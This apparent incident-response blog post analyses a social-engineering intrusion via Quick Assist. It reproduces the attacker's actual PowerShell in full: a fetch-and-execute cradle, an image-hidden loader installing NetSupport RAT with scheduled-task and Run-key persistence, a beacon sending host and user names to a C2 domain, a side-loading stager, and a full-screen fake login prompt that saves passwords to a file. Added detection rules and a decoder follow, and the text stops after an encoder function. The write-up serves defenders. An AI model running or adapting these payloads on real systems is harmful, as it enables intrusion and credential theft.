
Rapid Breach: Social Engineering to Remote Access in 300 Seconds

Tldr;

This post describes a recent incident response engagement handled by NCC Group’s Digital Forensics and Incident Response (DFIR) team: a social engineering attack followed by a quick succession of PowerShell commands that led to compromise.

The findings presented in this blog post are summarised below:

  • Initial access via social engineering
  • Use of QuickAssist.exe to execute PowerShell commands
  • System compromise and credentials harvesting

Incident Overview

The Threat Actor targeted around twenty users, impersonating IT support personnel, and successfully convinced two users to grant remote access to their system using the Windows native QuickAssist remote support tool.

In less than five minutes the Threat Actor executed PowerShell commands that led to the download of offensive tooling, malware execution and the creation of persistence mechanisms.

MITRE TTPs

Initial Access

T1566 – Phishing

Through social engineering, users were convinced to allow remote access to their systems via the QuickAssist support tool.

Execution

T1059.001 - Command and Scripting Interpreter: PowerShell

The following PowerShell commands were executed after the Threat Actor established a connection via QuickAssist:

(curl hxxps://resutato[.]com/2-4.txt).Content | Set-Clipboard
[Net.ServicePointManager]::SecurityProtocol=3072;$p=New-Object Net.WebClient;$p.Headers['User-Agent']='Mozilla/5.0 (Windows; N)';$k=$p.DownloadString('hxxps://resutato[.]com/b2/tap.php?tap='+[Net.Dns]::GetHostName());(&([ScriptBlock]::Create($k)));
curl -o update.zip hxxp://196.251.69[.]195:8085/update.zip
explorer.exe C:\Users\{username}\AppData\Roaming
cd update
msiexec.exe -i update.msi -q

The first command fetches 2-4.txt and copies its content, which is the second command, to the clipboard of the host:

(curl hxxps://resutato[.]com/2-4.txt).Content | Set-Clipboard

The second command

[Net.ServicePointManager]::SecurityProtocol=3072;$p=New-Object Net.WebClient;$p.Headers['User-Agent']='Mozilla/5.0 (Windows; N)';$k=$p.DownloadString('hxxps://resutato[.]com/b2/tap.php?tap='+[Net.Dns]::GetHostName());(&([ScriptBlock]::Create($k)));

forces TLS 1.2 (3072 is the SecurityProtocolType value for Tls12), sets a browser-like User-Agent, requests hxxps://resutato[.]com/b2/tap.php with the victim's hostname as the tap parameter, and executes the response body as a script block without writing it to disk. The PowerShell script it downloads and executes is:

& {
cd $eNV:apPDATA;
$POwNpQkB='hxxps://resutato[.]com/b2/srs/';
$mAKG='NetHealth';
$NuSbQ='hxxps://resutato[.]com/b2/res/nh2.jpg';
$XpaWuQ=@('PCICHEK.DLL', 'remcmdstub.exe', 'pcicapi.dll', 'NetHealth.exe', 'AudioCapture.dll', 'NSM.LIC', 'nskbfltr.inf', 'TCCTL32.DLL', 'nsm_vpro.ini', 'PCICL32.DLL', 'client32.ini', 'msvcr100.dll', 'HTCTL32.DLL');
[nET.SErVicEpoiNTmANAGER]::SECuRItYpRotoCOL=[nET.seCURITyPrOtOcoLTYpe]::Tls12;
try {
  $iQPPZ=-1;
  $DqGpjMG=New-Object System.Net.WebClient;
  [byte[]]$rayDe=$DqGpjMG.DownloadData($NuSbQ);
  $DqGpjMG.Dispose();
  Add-Type -AssemblyName System.IO.compression, System.IO.compression.FileSystem;
  [byte[]]$GSHLkr = 0x31, 0x67, 0xBE, 0xE1;
  for ($i=0; $i -le $rayDe.Length-4; $i++) { if (($rayDe[$i] -eq $GSHLkr[0]) -and ($rayDe[$i+1]-eq $GSHLkr[1]) -and ($rayDe[$i+2]-eq $GSHLkr[2]) -and ($rayDe[$i+3]-eq $GSHLkr[3])) { $iQPPZ=$i; break; } };
  if ($iQPPZ -lt 0) { throw 'Marker not found' };
  $qoBSqLF=$rayDe[($iQPPZ+6)..($rayDe.Length-1)];
  $mHyad=[int]$rayDe[$iQPPZ+5] - 128;
  $BHyY=$rayDe[0..($iQPPZ-1)];
  $YcDNuxbM=New-Object 'System.Collections.Generic.List[byte]';
  [int]$UhwzVYYp=$rayDe[$iQPPZ+4];
  for ($o=0; $o -lt $BHyY.Length; $o += 2*$UhwzVYYp) { $take=[Math]::Min($UhwzVYYp, [int]($BHyY.Length-$o)); $YcDNuxbM.AddRange([byte[]]$BHyY[$o..($o+$take-1)]); };
  [byte[]]$ajaAIt=$YcDNuxbM.ToArray();
  [byte[]]$PQnpWhMg=New-Object byte[] $qoBSqLF.Length;
  $dPqpOMvV=Join-Path $env:APPDATA $mAKG;
  if (-not (Test-Path $dPqpOMvV)) { New-Item -Force -ItemType Directory -Path $dPqpOMvV | Out-Null };
  $XjlghtUe=gi $dPqpOMvV -force; $XjlghtUe.attributes='Hidden';
  for ($i=0; $i -lt $qoBSqLF.Length; $i++) { $PQnpWhMg[$i] = $qoBSqLF[$i] -bxor $ajaAIt[$i % $ajaAIt.Length]; };
  $YyNd=[int]([math]::Floor($PQnpWhMg.Length/2)) + $mHyad;
  $unoEed=$PQnpWhMg.Length - $YyNd;
  $sMFzCAGe=$PQnpWhMg[$unoEed..($PQnpWhMg.Length-1)] + $PQnpWhMg[0..($unoEed-1)];
  $ms=New-Object IO.MemoryStream(,$sMFzCAGe);
  $za=New-Object IO.compression.ZipArchive($ms,[IO.compression.ZipArchiveMode]::Read);
  foreach ($e in $za.Entries) { $dst=[IO.File]::Create((Join-Path $dPqpOMvV $e.Name)); $e.Open().CopyTo($dst); $dst.Close(); }
  $za.Dispose(); $ms.Dispose();
} catch {
  $dPqpOMvV=Join-Path $env:APPDATA $mAKG;
  if (-not (Test-Path $dPqpOMvV)) { New-Item -Force -ItemType Directory -Path $dPqpOMvV | Out-Null };
  $XjlghtUe=gi $dPqpOMvV -force; $XjlghtUe.attributes='Hidden';
  if (Get-Command Start-BitsTransfer -ErrorAction SilentlyContinue) {
    $XpaWuQ | % { Start-BitsTransfer -Source ($POwNpQkB + $_) -Destination (Join-Path $dPqpOMvV $_); }
  } else {
    $XpaWuQ | % { $igYCy=$POwNpQkB + $_; $idQGm=Join-Path $dPqpOMvV $_; $zmqS='bitsadmin.exe /transfer NetHealth /download /priority normal "0" "1"' -f $igYCy,$idQGm; iex $zmqS; };
  };
};
try { net session > $null 2>&1; $KxzMqEBJ=$?; } catch { $KxzMqEBJ=$false; };
$mYSbjz=Join-Path (Join-Path $env:APPDATA $mAKG) 'NetHealth.exe';
Start-Process -FilePath $mYSbjz -WorkingDirectory (Split-Path $mYSbjz);
if ($KxzMqEBJ) {
  $xyDHlIKk=New-Object -ComObject 'Schedule.Service'; $xyDHlIKk.Connect();
  $Mneyz=$xyDHlIKk.GetFolder('\');
  $EDGmttky=$xyDHlIKk.NewTask(0);
  $HKaPQlqW=$EDGmttky.Triggers.Create(9);
  $Naqu=$EDGmttky.Actions.Create(0);
  $NTPZQf=$EDGmttky.Settings; $WJCem=$EDGmttky.RegistrationInfo;
  $NTPZQf.RunOnlyIfNetworkAvailable=$true; $NTPZQf.StopIfGoingOnBatteries=$false; $NTPZQf.RestartInterval='PT5M'; $NTPZQf.AllowHardTerminate=$false; $NTPZQf.Hidden=$true; $NTPZQf.DisallowStartIfOnBatteries=$false;
  $WJCem.Description='Scheduled system NetHealth task'; $WJCem.Author=$env:USERNAME;
  $HKaPQlqW.Id='LogonTriggerId'; $Naqu.Path=$mYSbjz; $NTPZQf.Priority=4; $HKaPQlqW.UserId=$env:USERNAME;
  $NTPZQf.ExecutionTimeLimit='PT0S'; $NTPZQf.RestartCount=50; $NTPZQf.StartWhenAvailable=$true;
  $EDGmttky.Principal.RunLevel=1;
  $Mneyz.RegisterTaskDefinition($mAKG,$EDGmttky,6,$env:USERNAME,$null,3);
} else {
  New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name $mAKG -Value $mYSbjz -PropertyType String -Force | Out-Null;
};
$odfAYgx=Get-Process NetHealth -ErrorAction SilentlyContinue;
$VsQEC="hxxps://resutato[.]com/b2/st/st.php?cpnme=$eNV:CoMPuTeRNAME&usnme=$env:uSernAme&param=";
IF ($odfAYgx.ID) { $CaSRw=$VsQEC+'zlLDBzqCcj'; curl $CaSRw -USeBAsIcparsInG;} else { $CaSRw=$VsQEC+'oXaYKeNOjn'; iwr $CaSRw -UsEbaSIcpaRsiNG;};
} *> $null

This script performs the following actions:

  • Setup and variables: changes directory to %APPDATA%, defines the download URLs and the list of NetSupport file names, and forces TLS 1.2 for its downloads.
  • Payload download and extraction: downloads a picture (see the picture below) from hxxps://resutato[.]com/b2/res/nh2.jpg. The image carries a marker-delimited, XOR-obfuscated payload that decodes to a .zip file. The script decodes it in memory and extracts the archive into C:\Users\{username}\AppData\Roaming\NetHealth\ (created as a hidden directory), which then contains the remote management software NetSupport Manager, whose client executable is delivered as NetHealth.exe, along with the DLLs, licence and configuration files it needs to run without being installed on the system.
  • Fallback download method: if the image-based method fails, the script downloads the file list directly from hxxps://resutato[.]com/b2/srs/ using Start-BitsTransfer or bitsadmin.
  • Payload execution and persistence: runs NetHealth.exe, then checks for administrative rights by running net session. If the check succeeds, it registers a hidden logon-triggered scheduled task named NetHealth that runs the binary with highest privileges; otherwise it adds a value named NetHealth under HKCU\Software\Microsoft\Windows\CurrentVersion\Run pointing to C:\Users\{username}\AppData\Roaming\NetHealth\NetHealth.exe, so the binary runs every time the user logs in.
  • Command and Control (C2) beacon: sends a request to hxxps://resutato[.]com/b2/st/st.php with the computer name, username and a status token indicating whether the NetHealth process is running.

The third command, curl -o update.zip hxxp://196.251.69[.]195:8085/update.zip, downloads update.zip from hxxp://196.251.69[.]195:8085/update.zip into the roaming folder of the current user's profile (C:\Users\{username}\AppData\Roaming), the working directory the second-stage script had already changed to. In Windows PowerShell, curl is an alias of Invoke-WebRequest (as the .Content property in the first command shows), so this download happened inside the existing PowerShell process and shows up in PowerShell logging rather than as a child process.

The Threat Actor then opened that folder with explorer.exe, moved into the extracted update directory (cd update) and ran msiexec.exe -i update.msi -q to silently install update.msi, which was contained in update.zip.

The file update.msi contained the following hidden payload:

$u = "hxxps://nimbusvaults[.]com/update/Z4Vw.zip"   # defined but unused; the URL is repeated literally below
$f = "GenUp.exe"                                      # legitimate Notepad++ updater, used as the side-loading host
$r = get-random -max 999999
$z = join-path $env:temp "u" + $r + ".zip"            # randomly named archive under %TEMP%
$d = join-path $env:temp "d" + $r                     # randomly named extraction directory under %TEMP%
iwr "hxxps://nimbusvaults[.]com/update/Z4Vw.zip" -usebasicparsing -outfile $z
expand-archive $z $d -force
rm $z -ea 0                                           # remove the archive, ignoring errors
$e = dir $d -filter $f -recurse -erroraction silentlycontinue|select -first 1
if ($e) {
  # Start-Process from the extraction directory, so GenUp.exe resolves libcurl.dll from there
  saps $e.fullname -workingdirectory $e.directoryname
}

This payload downloads a file named Z4Vw.zip from hxxps://nimbusvaults[.]com/update/Z4Vw.zip and extracts it to C:\Users\{username}\AppData\Local\Temp\{string}\. The archive contains a legitimate Notepad++ updater binary, GenUp.exe, several files consistent with legitimate use, and a malicious DLL named libcurl.dll, a known trojan that establishes communication with a C2 server hosted on nimbusvaults[.]com. Starting the legitimate GenUp.exe from that directory makes it load the attacker's libcurl.dll from the same folder in place of the genuine library (DLL side-loading), so the malicious code runs inside a benign-looking process.
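The command chain above (a Quick Assist session, a clipboard-staged download cradle, a quiet msiexec install and, later, regsvr32 loading a DLL out of AppData) is the kind of sequence worth alerting on. What follows is an added example, not code from the engagement or from NCC Group: a small Python detector run over constructed records in the shape of Sysmon/4688 process-creation events and PowerShell script block logs (Event ID 4104). The record layout, field names, host names, the 300-second window and the sample lines are assumptions made for the example (URLs in the sample are defanged as on this page). One design point matters: a helper driving the desktop through Quick Assist starts programs with their usual parents, so there is no QuickAssist.exe-to-powershell.exe parent/child link to pivot on, and the detector correlates on host and time instead.

```python
"""Detection logic for the Quick Assist -> PowerShell chain, over constructed log records.

Record shapes and field names are assumptions for this example; map them onto
your own telemetry (Sysmon Event 1 / Security 4688 for processes, PowerShell
4104 for script blocks, which needs script block logging enabled).
"""
import re
from dataclasses import dataclass


@dataclass
class Record:
    ts: int            # seconds since epoch (constructed values below)
    host: str
    kind: str          # "process" (Sysmon 1 / 4688) or "scriptblock" (PowerShell 4104)
    image: str = ""    # process image file name, for kind == "process"
    text: str = ""     # command line, or the logged script block text


# name -> (what it applies to, pattern). "scriptblock" rules inspect 4104 text;
# the others match a process image name and its command line.
RULES = {
    "ps_download_cradle": ("scriptblock", r"(?i)DownloadString|DownloadData|\biex\b|\[ScriptBlock\]::Create"),
    "ps_clipboard_staging": ("scriptblock", r"(?i)Set-Clipboard"),
    "bits_download": ("scriptblock", r"(?i)Start-BitsTransfer|bitsadmin(\.exe)?\s+/transfer"),
    "msiexec_quiet_install": ("msiexec.exe", r"(?i)(^|\s)[-/]i\s+\S*\.msi.*\s[-/]q"),
    "regsvr32_dll_from_appdata": ("regsvr32.exe", r'(?i)appdata\\roaming\\[^\s"]+\.dll'),
}
WINDOW = 300  # seconds after QuickAssist.exe starts; the whole chain on this page fit inside it


def match_rules(rec: Record) -> list:
    """Names of every rule the record satisfies, in RULES order."""
    names = []
    for name, (target, pattern) in RULES.items():
        if target == "scriptblock":
            hit = rec.kind == "scriptblock" and re.search(pattern, rec.text)
        else:
            hit = rec.kind == "process" and rec.image.lower() == target and re.search(pattern, rec.text)
        if hit:
            names.append(name)
    return names


def quickassist_starts(records) -> list:
    """(host, ts) for every QuickAssist.exe process start."""
    return [(r.host, r.ts) for r in records
            if r.kind == "process" and r.image.lower() == "quickassist.exe"]


def analyse(records) -> dict:
    """host -> [(ts, matched rule names, within WINDOW seconds of a Quick Assist start on that host)]"""
    sessions = quickassist_starts(records)
    out = {}
    for r in sorted(records, key=lambda x: x.ts):
        names = match_rules(r)
        if not names:
            continue
        in_window = any(h == r.host and 0 <= r.ts - t0 <= WINDOW for h, t0 in sessions)
        out.setdefault(r.host, []).append((r.ts, names, in_window))
    return out


def high_confidence_hosts(records) -> list:
    """Hosts where a PowerShell download cradle ran inside a Quick Assist window."""
    return sorted(host for host, hits in analyse(records).items()
                  if any(w and "ps_download_cradle" in names for _, names, w in hits))


# Constructed sample, loosely modelled on the command sequence on this page.
SAMPLE = [
    Record(1000, "WS01", "process", "QuickAssist.exe", "C:\\Windows\\System32\\QuickAssist.exe"),
    Record(1040, "WS01", "scriptblock", text="(curl hxxps://resutato[.]com/2-4.txt).Content | Set-Clipboard"),
    Record(1065, "WS01", "scriptblock", text="[Net.ServicePointManager]::SecurityProtocol=3072;$p=New-Object Net.WebClient;"
           "$k=$p.DownloadString('hxxps://resutato[.]com/b2/tap.php?tap=WS01');(&([ScriptBlock]::Create($k)));"),
    Record(1150, "WS01", "process", "msiexec.exe", "msiexec.exe -i update.msi -q"),
    Record(9000, "WS01", "process", "regsvr32.exe",
           'C:\\windows\\System32\\regsvr32.exe -e -n -i:"user" "C:\\Users\\alice\\AppData\\Roaming\\abc123\\def456.dll"'),
    Record(2000, "WS02", "scriptblock", text="Get-Process | Out-File $env:TEMP\\p.txt"),   # benign
    Record(5000, "WS02", "process", "msiexec.exe", "msiexec.exe /i C:\\Users\\bob\\AppData\\Local\\Temp\\Update.msi /qn"),
]

if __name__ == "__main__":
    for host, hits in analyse(SAMPLE).items():
        for ts, names, in_window in hits:
            print(host, ts, ",".join(names), "QUICKASSIST-WINDOW" if in_window else "")
    print("escalate:", high_confidence_hosts(SAMPLE))
```

The regsvr32 hit on WS01 falls outside the window, which is the expected shape for the scheduled-task persistence described later: it fires long after the interactive session ended, so it should be caught by the AppData-DLL rule on its own rather than by the time correlation.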

Persistence

T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

A value named NetHealth was added under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the data C:\Users\{username}\AppData\Roaming\NetHealth\NetHealth.exe, so the executable is launched each time the user logs in. This is the non-administrative branch of the script above, which is consistent with the net session check having failed on these hosts.

T1053.005 - Scheduled Task/Job: Scheduled Task

The scheduled task EventLogBackupTask was created and configured to run every five minutes. It executes the command C:\windows\System32\regsvr32.exe -e -n -i:"user" "C:\Users\{username}\AppData\Roaming\{string}\{string}.dll".

The DLL is the malicious libcurl.dll copied under a randomly generated name into a folder with a randomly generated name under C:\Users\{username}\AppData\Roaming\; both names were generated separately on each host. Invoking it through regsvr32.exe with -n -i runs the DLL's DllInstall export from a Microsoft-signed Windows binary rather than from a loader of the Threat Actor's own.

Credential Access

T1056.002 - Input Capture: GUI Input Capture

The threat actor executed the script C:\Users\{username}\Videos\l.ps1 which creates a GUI window prompting the user to input their credentials, which are then written to the file C:\Users\{username}\AppData\Local\Temp\cred.txt.

Add-Type -AssemblyName PresentationFramework, System.Xaml 
$signature = @' 
[DllImport("user32.dll", SetLastError = true)] 
public static extern IntPtr FindWindow(string lpClassName, string lpWindowName); 
[DllImport("user32.dll", SetLastError = true)] 
public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); 
'@ 
Add-Type -MemberDefinition $signature -Namespace WinAPI -Name User32 
[xml]$xaml = @" 
<Window xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" 
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" 
        Title="System Credential Verification" WindowStyle="None" 
        Background="Transparent" AllowsTransparency="True" 
        WindowStartupLocation="CenterScreen" 
        Topmost="True" ResizeMode="NoResize"> 
    <Grid> 
        <Rectangle Name="Overlay" Fill="#AA000000" IsHitTestVisible="True"/> 
        <Border HorizontalAlignment="Center" VerticalAlignment="Center" 
                BorderBrush="#DDD" BorderThickness="1" Padding="20" 
                Background="White" CornerRadius="5"> 
            <StackPanel Width="350"> 
                <TextBlock Text="For security reasons, we need to verify your account credentials." TextWrapping="Wrap" 
                           Margin="0,0,0,20" FontSize="14" HorizontalAlignment="Center"/> 
                <TextBlock Text="Please re-enter your username and password to continue using this device." TextWrapping="Wrap" 
                           Margin="0,0,0,20" FontSize="13" Foreground="Gray" HorizontalAlignment="Center"/> 
                <TextBox Name="UsernameBox" Margin="0,0,0,10" Width="250" Height="30" FontSize="14" /> 
                <PasswordBox Name="PasswordBox" Width="250" Height="30" FontSize="14"/> 
                <Button Name="LoginBtn" Content="Login" Margin="0,20,0,0" Width="100" Height="30" 
                        /> 
            </StackPanel> 
        </Border> 
    </Grid> 
</Window> 
"@ 
$reader = New-Object System.Xml.XmlNodeReader $xaml 
$window = [Windows.Markup.XamlReader]::Load($reader) 
$UsernameBox = $window.FindName("UsernameBox") 
$PasswordBox = $window.FindName("PasswordBox") 
$LoginBtn = $window.FindName("LoginBtn") 
$screenWidth = [System.Windows.SystemParameters]::PrimaryScreenWidth 
$screenHeight = [System.Windows.SystemParameters]::PrimaryScreenHeight 
$window.Width = $screenWidth 
$window.Height = $screenHeight 
$window.WindowStartupLocation = "CenterScreen" 
function Hide-Taskbar { 
    $taskbarHandle = [WinAPI.User32]::FindWindow("Shell_TrayWnd", $null) 
    if ($taskbarHandle -ne [IntPtr]::Zero) { 
        [WinAPI.User32]::ShowWindow($taskbarHandle, 0) # SW_HIDE 
    } 
} 
function Show-Taskbar { 
    $taskbarHandle = [WinAPI.User32]::FindWindow("Shell_TrayWnd", $null) 
    if ($taskbarHandle -ne [IntPtr]::Zero) { 
        [WinAPI.User32]::ShowWindow($taskbarHandle, 5) # SW_SHOW 
    } 
} 
$script:timer = $null 
$LoginBtn.Add_Click({ 
    $username = $UsernameBox.Text.Trim() 
    $password = $PasswordBox.Password.Trim() 
    if ([string]::IsNullOrWhiteSpace($username) -or [string]::IsNullOrWhiteSpace($password)) { 
        [System.Windows.MessageBox]::Show("Both fields are required.", "Error", "OK", "Error") 
        return 
    } 
    $output = "Username: $username`nPassword: $password`n-------------------`n" 
    Add-Content -Path "$env:TEMP\cred.txt" -Value $output 
    try { 
        $securePass = ConvertTo-SecureString $password -AsPlainText -Force 
        $credential = New-Object System.Management.Automation.PSCredential ($username, $securePass) 
        $null = Start-Process cmd.exe -Credential $credential -ArgumentList "/c exit" -WindowStyle Hidden -ErrorAction Stop 
        [System.Windows.MessageBox]::Show("Authentication successful!", "Success", "OK", "Information") 
        $script:timer.Stop() # Останавливаем таймер 
        $window.Close() 
    } catch { 
        [System.Windows.MessageBox]::Show("Invalid username or password.", "Authentication Failed", "OK", "Error") 
    } 
}) 
$window.Add_KeyDown({ 
    param($sender, $e) 
    switch ($e.Key) { 
        ([System.Windows.Input.Key]::LWin)     { $e.Handled = $true } 
        ([System.Windows.Input.Key]::RWin)     { $e.Handled = $true } 
        ([System.Windows.Input.Key]::System)   { $e.Handled = $true } 
        ([System.Windows.Input.Key]::Escape)   { $e.Handled = $true } 
        ([System.Windows.Input.Key]::LeftAlt)  { $e.Handled = $true } 
        ([System.Windows.Input.Key]::RightAlt) { $e.Handled = $true } 
        ([System.Windows.Input.Key]::Tab)      { $e.Handled = $true } 
        default {} 
    } 
}) 
$window.Add_ContentRendered({ 
    Hide-Taskbar 
})

Command and Control

T1071.001 - Application Layer Protocol: Web Protocols

The script downloaded and executed by the Threat Actor using PowerShell sends a request to hxxps[:]//resutato[.]com/b2/st/st.php with the Computer name, Username and the status of the NetHealth process.

Malicious Payload Deep Dive

As described above, the script fetched by the second command (from tap.php) performs a series of malicious actions in a very short span of time. Step by step:

  1. Image download: fetches a JPEG file that carries the embedded payload.
    $NuSbQ = 'hxxps://resutato[.]com/b2/res/nh2.jpg'

  2. Marker search and extraction:
    a. Searches for a magic marker in the byte stream to locate the payload.
    $GSHLkr = 0x31, 0x67, 0xBE, 0xE1
    for ($i = 0; $i -le $rayDe.Length - 4; $i++) {
        if (
            ($rayDe[$i] -eq $GSHLkr[0]) -and
            ($rayDe[$i+1] -eq $GSHLkr[1]) -and
            ($rayDe[$i+2] -eq $GSHLkr[2]) -and
            ($rayDe[$i+3] -eq $GSHLkr[3])
        ) {
            $iQPPZ = $i
            break
        }
    }

    This loop scans the downloaded byte array ($rayDe) for the 4-byte marker 31 67 BE E1. When found, it stores the index in $iQPPZ; if the marker is absent the script throws, which lands in the catch block and triggers the BITS fallback.

    b. Once the marker is found, the byte array is split into three parts: the encrypted payload, two metadata bytes and the key material.
    i. Encrypted payload: the main encrypted data, starting 6 bytes after the marker.
    $qoBSqLF = $rayDe[($iQPPZ + 6)..($rayDe.Length - 1)]

    ii. Metadata: the two bytes between the marker and the encrypted payload. $UhwzVYYp (offset +4) is the chunk size used for key derivation; $mHyad (offset +5, stored with a bias of 128 so that it can be negative) is the offset used when reordering the decrypted data.
    $UhwzVYYp = [int]$rayDe[$iQPPZ + 4]
    $mHyad = [int]$rayDe[$iQPPZ + 5] - 128

    iii. Key material: taken from the beginning of the file up to the marker, i.e. from the real image data. Every other $UhwzVYYp-sized chunk is concatenated to build the XOR key ($ajaAIt), so the key changes with every image the server produces.
    $BHyY = $rayDe[0..($iQPPZ - 1)]
    $YcDNuxbM = New-Object 'System.Collections.Generic.List[byte]'
    for ($o = 0; $o -lt $BHyY.Length; $o += 2 * $UhwzVYYp) {
        $take = [Math]::Min($UhwzVYYp, [int]($BHyY.Length - $o))
        $YcDNuxbM.AddRange([byte[]]$BHyY[$o..($o + $take - 1)])
    }
    $ajaAIt = $YcDNuxbM.ToArray()

  3. Decryption: XORs the payload with the derived key. $qoBSqLF is the encrypted payload, $ajaAIt the derived key and $PQnpWhMg the decrypted result.
    [byte[]]$PQnpWhMg = New-Object byte[] $qoBSqLF.Length
    for ($i = 0; $i -lt $qoBSqLF.Length; $i++) {
        $PQnpWhMg[$i] = $qoBSqLF[$i] -bxor $ajaAIt[$i % $ajaAIt.Length]
    }

    The loop applies a byte-wise XOR between each byte of the encrypted payload and the corresponding byte of the key, repeating the key as needed using modulo. This is a classic repeating-key XOR cipher used by many malware loaders to obfuscate payloads; it offers no real confidentiality, only evasion of static scanning.

  4. Payload reordering: after XOR decryption the buffer is rotated to reconstruct the original ZIP archive. A split point is calculated from half the length plus $mHyad, and the last $YyNd bytes are moved to the front.
    $YyNd = [int]([math]::Floor($PQnpWhMg.Length / 2)) + $mHyad
    $unoEed = $PQnpWhMg.Length - $YyNd
    $sMFzCAGe = $PQnpWhMg[$unoEed..($PQnpWhMg.Length - 1)] + $PQnpWhMg[0..($unoEed - 1)]

    Without this step the local file headers and the end-of-central-directory record are not where a ZIP parser expects them, so even a correctly XOR-decoded buffer does not look like an archive.

  5. Unpacking: the reordered buffer is wrapped in a memory stream, opened as a ZIP archive and every entry is written to %APPDATA%\NetHealth, which the script created as a hidden directory.
    $ms = New-Object IO.MemoryStream(, $sMFzCAGe)
    $za = New-Object IO.Compression.ZipArchive($ms, [IO.Compression.ZipArchiveMode]::Read)
    foreach ($e in $za.Entries) {
        $dst = [IO.File]::Create((Join-Path $dPqpOMvV $e.Name))
        $e.Open().CopyTo($dst)
        $dst.Close()
    }
    $za.Dispose()
    $ms.Dispose()

  6. Execution: the main executable is launched from the extraction directory.
    $mYSbjz = Join-Path (Join-Path $env:APPDATA $mAKG) 'NetHealth.exe'
    Start-Process -FilePath $mYSbjz -WorkingDirectory (Split-Path $mYSbjz)

  7. Persistence: the script tests for administrative rights by running net session and picks one of two mechanisms depending on the result.
    a. Scheduled task (administrative session): a hidden, logon-triggered task named NetHealth that runs with highest privileges and restarts itself up to 50 times at five-minute intervals.
    $xyDHlIKk = New-Object -ComObject 'Schedule.Service'
    $xyDHlIKk.Connect()
    $Mneyz = $xyDHlIKk.GetFolder('\')
    $EDGmttky = $xyDHlIKk.NewTask(0)

    $HKaPQlqW = $EDGmttky.Triggers.Create(9)   # TASK_TRIGGER_LOGON
    $Naqu = $EDGmttky.Actions.Create(0)        # TASK_ACTION_EXEC: start a program
    $Naqu.Path = $mYSbjz                       # path to NetHealth.exe

    $NTPZQf = $EDGmttky.Settings
    $WJCem = $EDGmttky.RegistrationInfo

    $NTPZQf.RunOnlyIfNetworkAvailable = $true
    $NTPZQf.StopIfGoingOnBatteries = $false
    $NTPZQf.RestartInterval = 'PT5M'
    $NTPZQf.AllowHardTerminate = $false
    $NTPZQf.Hidden = $true
    $NTPZQf.DisallowStartIfOnBatteries = $false

    $WJCem.Description = 'Scheduled system NetHealth task'
    $WJCem.Author = $env:USERNAME

    $HKaPQlqW.Id = 'LogonTriggerId'
    $HKaPQlqW.UserId = $env:USERNAME

    $NTPZQf.Priority = 4
    $NTPZQf.ExecutionTimeLimit = 'PT0S'        # no execution time limit
    $NTPZQf.RestartCount = 50
    $NTPZQf.StartWhenAvailable = $true

    $EDGmttky.Principal.RunLevel = 1           # TASK_RUNLEVEL_HIGHEST: run with highest privileges

    # 6 = TASK_CREATE_OR_UPDATE, 3 = TASK_LOGON_INTERACTIVE_TOKEN
    $Mneyz.RegisterTaskDefinition($mAKG, $EDGmttky, 6, $env:USERNAME, $null, 3)

    b. Registry Run value (non-administrative session):
    New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name $mAKG -Value $mYSbjz -PropertyType String -Force | Out-Null

  8. Command and Control beaconing: builds a URL with the computer name, username and a status token, then requests it. $odfAYgx holds the result of Get-Process NetHealth, so the token tells the server whether the RAT is running.
    $VsQEC = "hxxps://resutato[.]com/b2/st/st.php?cpnme=$eNV:CoMPuTeRNAME&usnme=$env:uSernAme&param="
    IF ($odfAYgx.ID) {
        $CaSRw = $VsQEC + 'zlLDBzqCcj'   # NetHealth.exe is running
        curl $CaSRw -UseBasicParsing
    } else {
        $CaSRw = $VsQEC + 'oXaYKeNOjn'   # NetHealth.exe is not running
        iwr $CaSRw -UseBasicParsing
    }
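To check the analysis of steps 1 to 5 end to end, here is an added example, not code from the page or from the threat actor: a Python reimplementation of the decoder (marker search, key derivation from the pre-marker image bytes, repeating-key XOR and the tail-to-head rotation) together with the inverse encoder, so the decoder can be exercised offline on a constructed stand-in for nh2.jpg. The encoder, the fake JPEG prefix and the sample archive contents are assumptions made for the example; the decoding logic follows the PowerShell on this page.

```python
"""Decoder for the marker-delimited, XOR-obfuscated ZIP container that the tap.php
stage hides inside nh2.jpg, reimplemented from the PowerShell on this page.

encode_payload() is the inverse, written here only so the decoder can be tested on
a constructed sample; the real dropper ships just the decoding side.
"""
import io
import zipfile

MARKER = b"\x31\x67\xbe\xe1"  # the 4-byte marker the loader scans for


def find_marker(blob: bytes) -> int:
    """Index of the first marker occurrence (the loader's byte-by-byte scan)."""
    idx = blob.find(MARKER)
    if idx < 0:
        raise ValueError("Marker not found")
    return idx


def derive_key(prefix: bytes, chunk: int) -> bytes:
    """Key = every other chunk-sized slice of the bytes before the marker.

    The original script never validates chunk: a zero would make its loop spin
    forever, so it is rejected here.
    """
    if chunk <= 0 or not prefix:
        raise ValueError("chunk size must be positive and the prefix non-empty")
    return b"".join(prefix[o:o + chunk] for o in range(0, len(prefix), 2 * chunk))


def decode_payload(blob: bytes) -> bytes:
    """Image bytes -> ZIP archive bytes, following steps 2 to 4 of the write-up."""
    i = find_marker(blob)
    if len(blob) < i + 6:
        raise ValueError("truncated container")
    chunk = blob[i + 4]          # metadata byte at +4: key chunk size
    rot = blob[i + 5] - 128      # metadata byte at +5: rotation offset, biased by 128
    enc = blob[i + 6:]           # ciphertext starts 6 bytes after the marker
    key = derive_key(blob[:i], chunk)
    dec = bytes(b ^ key[n % len(key)] for n, b in enumerate(enc))
    split = len(dec) // 2 + rot
    cut = len(dec) - split
    if not 0 <= cut <= len(dec):
        raise ValueError("rotation offset out of range")
    return dec[cut:] + dec[:cut]  # the last `split` bytes move to the front


def encode_payload(prefix: bytes, plain: bytes, chunk: int, rot: int) -> bytes:
    """Inverse of decode_payload (constructed for testing; not part of the sample)."""
    if MARKER in prefix:
        raise ValueError("prefix must not contain the marker")
    if not -128 <= rot <= 127:
        raise ValueError("rot must fit in a biased byte")
    n = len(plain)
    cut = n - (n // 2 + rot)
    if not 0 <= cut <= n:
        raise ValueError("rotation offset out of range")
    dec = plain[n - cut:] + plain[:n - cut]   # undo the tail-to-head rotation
    key = derive_key(prefix, chunk)
    enc = bytes(b ^ key[i % len(key)] for i, b in enumerate(dec))
    return prefix + MARKER + bytes([chunk, rot + 128]) + enc


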